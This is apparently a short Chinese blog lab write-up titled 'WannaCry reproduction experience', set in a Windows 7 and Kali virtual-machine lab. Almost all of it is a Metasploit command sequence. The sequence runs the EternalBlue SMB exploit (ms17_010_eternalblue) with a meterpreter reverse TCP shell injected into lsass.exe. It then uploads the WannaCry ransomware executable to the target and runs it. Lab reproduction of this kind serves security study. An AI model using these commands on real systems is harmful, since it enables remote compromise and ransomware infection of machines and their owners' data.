WannaCry复现体验

实验准备

  • Windows 7 x64 虚拟机(关闭防火墙)
  • Kali x64 虚拟机
  • WannaCry 病毒样本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# kaii终端输入
msfconsole

# 使用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue

# 设置靶机IP地址
set rhost 192.168.113.129

# 操作机IP地址
set lhost 192.168.113.131

# 使用meterpreter编写的TCP反弹连接木马
set payload windows/x64/meterpreter/reverse_tcp

set processinject lsass.exe

set targetarchitecture x64
# 漏洞利用
exploit

# 将WannaCry病毒上传到靶机
upload /root/桌面/wcry2.0/wcry.exe C:\\

# 执行病毒
execute -f C:\\wcry.exe

QwJvuV.png

QwJmfs.png